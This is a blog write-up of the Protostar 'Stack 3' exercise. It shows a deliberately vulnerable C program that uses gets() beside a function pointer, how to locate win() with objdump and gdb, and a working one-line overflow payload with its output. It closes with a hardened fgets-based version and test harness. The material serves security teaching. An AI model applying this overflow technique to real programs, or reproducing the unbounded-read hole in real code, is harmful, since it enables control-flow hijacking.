Sunday, December 9, 2012

exploit-exercises Protostar: Stack 3

This time, with the Stack 3 challenge of the Protostar wargame, we have another
vulnerable program to exploit. The source code is provided as follows:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    volatile int (*fp)();   /* function pointer stored next to buffer on the stack */
    char buffer[64];

    fp = 0;

    gets(buffer);           /* unbounded read: can overflow buffer into fp */

    if(fp) {
        printf("calling function pointer, jumping to 0x%08x\n", fp);
        fp();
    }
}
We have to alter the program's control flow so that it runs the win() function. fp is the function pointer
whose value must be overwritten with the memory address of win().
One way to find win()'s address is the objdump utility:
user@protostar:~$ objdump -d /opt/protostar/bin/stack3 | grep win
08048424 <win>:
Another method is to use the GNU Debugger:
user@protostar:~$ gdb -q /opt/protostar/bin/stack3
Reading symbols from /opt/protostar/bin/stack3...done.
(gdb) p win
$1 = {void (void)} 0x8048424 <win>
With win()'s address known to be 0x8048424, and taking endianness into account
(x86 is little-endian, so the address is written least-significant byte first), we use the
following payload: the first 64 bytes fill buffer, and the next four bytes land on fp, which
sits directly above it on the stack:
user@protostar:~$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
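For contrast, here is how the same input step looks once gets() is replaced by a bounded read. This is an added example written for this post, not code from Protostar or from the stack3 binary; read_line_bounded, run_hardened, check_sample and the 70-byte SAMPLE_INPUT are hypothetical names and constructed data. The buffer is still 64 bytes and fp still sits beside it, but an over-long line is now truncated rather than spilling into fp.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical hardened version of the stack3 input step (added example, not
 * the Protostar code): gets() is replaced by a read bounded to sizeof(buffer),
 * so an over-long line is cut off instead of overwriting the neighbouring fp. */

/* Read one line into dst (capacity cap), strip the newline, and discard any
 * excess on the same line so it is not picked up later as a second line.
 * Returns the number of bytes stored, or -1 on EOF/error before any data. */
long read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
    } else {
        int c;  /* line longer than cap - 1: drain the rest of it */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (long)len;
}

/* Same control flow as stack3's main(), with gets() replaced. The line that
 * ended up in buffer is copied to `copy` for inspection. Returns 1 if fp was
 * non-NULL after the read (impossible without memory corruption), 0 if it
 * stayed NULL, -1 if no input was available. */
int run_hardened(FILE *in, char *copy, size_t copy_cap)
{
    void (*volatile fp)(void) = NULL;   /* volatile keeps the check honest */
    char buffer[64];

    if (read_line_bounded(buffer, sizeof buffer, in) < 0)
        return -1;
    if (copy != NULL && copy_cap > 0) {
        strncpy(copy, buffer, copy_cap - 1);
        copy[copy_cap - 1] = '\0';
    }
    if (fp) {
        fp();
        return 1;
    }
    return 0;
}

/* Constructed sample input (not captured from the real binary): a 70-byte
 * line, longer than the 64-byte buffer, followed by a short second line. */
static const char SAMPLE_INPUT[] =
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "\n"
    "short\n";

/* Feed SAMPLE_INPUT to the hardened reader through a tmpfile() stream and
 * report: bytes kept from line 1, whether fp was called, bytes kept from
 * line 2 (the overflow must not bleed into it). 0 on success, -1 otherwise. */
int check_sample(long *kept1, int *fp_called, long *kept2)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return -1;
    fputs(SAMPLE_INPUT, f);
    rewind(f);

    char copy[64] = "", second[64] = "";
    int called = run_hardened(f, copy, sizeof copy);
    long n2 = read_line_bounded(second, sizeof second, f);
    fclose(f);
    if (called < 0 || n2 < 0)
        return -1;
    *kept1 = (long)strlen(copy);
    *fp_called = called;
    *kept2 = n2;
    return 0;
}

/* Single-value accessors so each outcome can be checked on its own. */
long sample_kept_from_first_line(void)
{ long a = -1, b = -1; int c = -1; return check_sample(&a, &c, &b) == 0 ? a : -1; }
int sample_fp_called(void)
{ long a = -1, b = -1; int c = -1; return check_sample(&a, &c, &b) == 0 ? c : -1; }
long sample_kept_from_second_line(void)
{ long a = -1, b = -1; int c = -1; return check_sample(&a, &c, &b) == 0 ? b : -1; }

int main(void)
{
    long k1, k2; int c;
    if (check_sample(&k1, &c, &k2) != 0)
        return 1;
    printf("line 1 kept %ld of 70 bytes, fp called: %d, line 2 kept %ld bytes\n",
           k1, c, k2);
    return 0;
}
```

Compile it with a plain `gcc` invocation and run it: the 70-byte line is cut to 63 bytes (fgets leaves room for the terminator), the 7 surplus bytes and the newline are drained rather than left in the stream, the second line is read intact, and fp is never anything but NULL. The stack layout that makes stack3 exploitable is unchanged; what changed is that the read can no longer reach past buffer.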